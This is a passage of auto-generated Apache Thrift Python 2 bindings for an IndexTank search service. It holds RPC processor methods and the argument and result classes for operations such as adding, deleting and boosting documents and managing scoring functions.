result.ite = ite
oprot.writeMessageBegin("listScoreFunctions", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_stats(self, seqid, iprot, oprot):
args = stats_args()
args.read(iprot)
iprot.readMessageEnd()
result = stats_result()
try:
result.success = self._handler.stats()
except IndextankException, ite:
result.ite = ite
oprot.writeMessageBegin("stats", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_get_stats(self, seqid, iprot, oprot):
args = get_stats_args()
args.read(iprot)
iprot.readMessageEnd()
result = get_stats_result()
try:
result.success = self._handler.get_stats()
except IndextankException, ite:
result.ite = ite
oprot.writeMessageBegin("get_stats", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_force_gc(self, seqid, iprot, oprot):
args = force_gc_args()
args.read(iprot)
iprot.readMessageEnd()
result = force_gc_result()
try:
self._handler.force_gc()
except IndextankException, ite:
result.ite = ite
oprot.writeMessageBegin("force_gc", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_getStatus(self, seqid, iprot, oprot):
args = getStatus_args()
args.read(iprot)
iprot.readMessageEnd()
result = getStatus_result()
result.success = self._handler.getStatus()
oprot.writeMessageBegin("getStatus", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_ping(self, seqid, iprot, oprot):
args = ping_args()
args.read(iprot)
iprot.readMessageEnd()
result = ping_result()
self._handler.ping()
oprot.writeMessageBegin("ping", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_startFullRecovery(self, seqid, iprot, oprot):
args = startFullRecovery_args()
args.read(iprot)
iprot.readMessageEnd()
result = startFullRecovery_result()
self._handler.startFullRecovery()
oprot.writeMessageBegin("startFullRecovery", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
# HELPER FUNCTIONS AND STRUCTURES
class addDoc_args:
"""
Attributes:
- docid
- doc
- timestamp_boost
- boosts
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'docid', None, None, ), # 1
(2, TType.STRUCT, 'doc', (Document, Document.thrift_spec), None, ), # 2
(3, TType.I32, 'timestamp_boost', None, None, ), # 3
(4, TType.MAP, 'boosts', (TType.I32,None,TType.DOUBLE,None), None, ), # 4
)
def __init__(self, docid=None, doc=None, timestamp_boost=None, boosts=None,):
self.docid = docid
self.doc = doc
self.timestamp_boost = timestamp_boost
self.boosts = boosts
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.docid = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.doc = Document()
self.doc.read(iprot)
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I32:
self.timestamp_boost = iprot.readI32();
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.MAP:
self.boosts = {}
(_ktype207, _vtype208, _size206 ) = iprot.readMapBegin()
for _i210 in xrange(_size206):
_key211 = iprot.readI32();
_val212 = iprot.readDouble();
self.boosts[_key211] = _val212
iprot.readMapEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('addDoc_args')
if self.docid != None:
oprot.writeFieldBegin('docid', TType.STRING, 1)
oprot.writeString(self.docid)
oprot.writeFieldEnd()
if self.doc != None:
oprot.writeFieldBegin('doc', TType.STRUCT, 2)
self.doc.write(oprot)
oprot.writeFieldEnd()
if self.timestamp_boost != None:
oprot.writeFieldBegin('timestamp_boost', TType.I32, 3)
oprot.writeI32(self.timestamp_boost)
oprot.writeFieldEnd()
if self.boosts != None:
oprot.writeFieldBegin('boosts', TType.MAP, 4)
oprot.writeMapBegin(TType.I32, TType.DOUBLE, len(self.boosts))
for kiter213,viter214 in self.boosts.items():
oprot.writeI32(kiter213)
oprot.writeDouble(viter214)
oprot.writeMapEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class addDoc_result:
"""
Attributes:
- ite
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'ite', (IndextankException, IndextankException.thrift_spec), None, ), # 1
)
def __init__(self, ite=None,):
self.ite = ite
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.ite = IndextankException()
self.ite.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('addDoc_result')
if self.ite != None:
oprot.writeFieldBegin('ite', TType.STRUCT, 1)
self.ite.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class updateTimestampBoost_args:
"""
Attributes:
- docid
- timestamp_boost
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'docid', None, None, ), # 1
(2, TType.I32, 'timestamp_boost', None, None, ), # 2
)
def __init__(self, docid=None, timestamp_boost=None,):
self.docid = docid
self.timestamp_boost = timestamp_boost
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.docid = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I32:
self.timestamp_boost = iprot.readI32();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('updateTimestampBoost_args')
if self.docid != None:
oprot.writeFieldBegin('docid', TType.STRING, 1)
oprot.writeString(self.docid)
oprot.writeFieldEnd()
if self.timestamp_boost != None:
oprot.writeFieldBegin('timestamp_boost', TType.I32, 2)
oprot.writeI32(self.timestamp_boost)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class updateTimestampBoost_result:
"""
Attributes:
- ite
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'ite', (IndextankException, IndextankException.thrift_spec), None, ), # 1
)
def __init__(self, ite=None,):
self.ite = ite
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.ite = IndextankException()
self.ite.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('updateTimestampBoost_result')
if self.ite != None:
oprot.writeFieldBegin('ite', TType.STRUCT, 1)
self.ite.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class updateBoost_args:
"""
Attributes:
- docid
- boosts
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'docid', None, None, ), # 1
(2, TType.MAP, 'boosts', (TType.I32,None,TType.DOUBLE,None), None, ), # 2
)
def __init__(self, docid=None, boosts=None,):
self.docid = docid
self.boosts = boosts
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.docid = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.MAP:
self.boosts = {}
(_ktype216, _vtype217, _size215 ) = iprot.readMapBegin()
for _i219 in xrange(_size215):
_key220 = iprot.readI32();
_val221 = iprot.readDouble();
self.boosts[_key220] = _val221
iprot.readMapEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('updateBoost_args')
if self.docid != None:
oprot.writeFieldBegin('docid', TType.STRING, 1)
oprot.writeString(self.docid)
oprot.writeFieldEnd()
if self.boosts != None:
oprot.writeFieldBegin('boosts', TType.MAP, 2)
oprot.writeMapBegin(TType.I32, TType.DOUBLE, len(self.boosts))
for kiter222,viter223 in self.boosts.items():
oprot.writeI32(kiter222)
oprot.writeDouble(viter223)
oprot.writeMapEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class updateBoost_result:
"""
Attributes:
- ite
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'ite', (IndextankException, IndextankException.thrift_spec), None, ), # 1
)
def __init__(self, ite=None,):
self.ite = ite
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.ite = IndextankException()
self.ite.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('updateBoost_result')
if self.ite != None:
oprot.writeFieldBegin('ite', TType.STRUCT, 1)
self.ite.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class updateCategories_args:
"""
Attributes:
- docid
- categories
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'docid', None, None, ), # 1
(2, TType.MAP, 'categories', (TType.STRING,None,TType.STRING,None), None, ), # 2
)
def __init__(self, docid=None, categories=None,):
self.docid = docid
self.categories = categories
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.docid = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.MAP:
self.categories = {}
(_ktype225, _vtype226, _size224 ) = iprot.readMapBegin()
for _i228 in xrange(_size224):
_key229 = iprot.readString();
_val230 = iprot.readString();
self.categories[_key229] = _val230
iprot.readMapEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('updateCategories_args')
if self.docid != None:
oprot.writeFieldBegin('docid', TType.STRING, 1)
oprot.writeString(self.docid)
oprot.writeFieldEnd()
if self.categories != None:
oprot.writeFieldBegin('categories', TType.MAP, 2)
oprot.writeMapBegin(TType.STRING, TType.STRING, len(self.categories))
for kiter231,viter232 in self.categories.items():
oprot.writeString(kiter231)
oprot.writeString(viter232)
oprot.writeMapEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class updateCategories_result:
"""
Attributes:
- ite
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'ite', (IndextankException, IndextankException.thrift_spec), None, ), # 1
)
def __init__(self, ite=None,):
self.ite = ite
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.ite = IndextankException()
self.ite.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('updateCategories_result')
if self.ite != None:
oprot.writeFieldBegin('ite', TType.STRUCT, 1)
self.ite.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class delDoc_args:
"""
Attributes:
- docid
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'docid', None, None, ), # 1
)
def __init__(self, docid=None,):
self.docid = docid
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.docid = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('delDoc_args')
if self.docid != None:
oprot.writeFieldBegin('docid', TType.STRING, 1)
oprot.writeString(self.docid)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class delDoc_result:
"""
Attributes:
- ite
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'ite', (IndextankException, IndextankException.thrift_spec), None, ), # 1
)
def __init__(self, ite=None,):
self.ite = ite
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.ite = IndextankException()
self.ite.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('delDoc_result')
if self.ite != None:
oprot.writeFieldBegin('ite', TType.STRUCT, 1)
self.ite.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class promoteResult_args:
"""
Attributes:
- docid
- query
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'docid', None, None, ), # 1
(2, TType.STRING, 'query', None, None, ), # 2
)
def __init__(self, docid=None, query=None,):
self.docid = docid
self.query = query
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.docid = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.query = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('promoteResult_args')
if self.docid != None:
oprot.writeFieldBegin('docid', TType.STRING, 1)
oprot.writeString(self.docid)
oprot.writeFieldEnd()
if self.query != None:
oprot.writeFieldBegin('query', TType.STRING, 2)
oprot.writeString(self.query)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class promoteResult_result:
"""
Attributes:
- ite
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'ite', (IndextankException, IndextankException.thrift_spec), None, ), # 1
)
def __init__(self, ite=None,):
self.ite = ite
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.ite = IndextankException()
self.ite.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('promoteResult_result')
if self.ite != None:
oprot.writeFieldBegin('ite', TType.STRUCT, 1)
self.ite.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class dump_args:
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('dump_args')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class dump_result:
"""
Attributes:
- ite
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'ite', (IndextankException, IndextankException.thrift_spec), None, ), # 1
)
def __init__(self, ite=None,):
self.ite = ite
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.ite = IndextankException()
self.ite.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('dump_result')
if self.ite != None:
oprot.writeFieldBegin('ite', TType.STRUCT, 1)
self.ite.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class addScoreFunction_args:
"""
Attributes:
- functionIndex
- definition
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'functionIndex', None, None, ), # 1
(2, TType.STRING, 'definition', None, None, ), # 2
)
def __init__(self, functionIndex=None, definition=None,):
self.functionIndex = functionIndex
self.definition = definition
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.functionIndex = iprot.readI32();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.definition = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('addScoreFunction_args')
if self.functionIndex != None:
oprot.writeFieldBegin('functionIndex', TType.I32, 1)
oprot.writeI32(self.functionIndex)
oprot.writeFieldEnd()
if self.definition != None:
oprot.writeFieldBegin('definition', TType.STRING, 2)
oprot.writeString(self.definition)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class addScoreFunction_result:
"""
Attributes:
- ite
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'ite', (IndextankException, IndextankException.thrift_spec), None, ), # 1
)
def __init__(self, ite=None,):
self.ite = ite
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.ite = IndextankException()
self.ite.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('addScoreFunction_result')
if self.ite != None:
oprot.writeFieldBegin('ite', TType.STRUCT, 1)
self.ite.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class removeScoreFunction_args:
"""
Attributes:
- functionIndex
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'functionIndex', None, None, ), # 1
)
def __init__(self, functionIndex=None,):
self.functionIndex = functionIndex
def read(self, iprot):
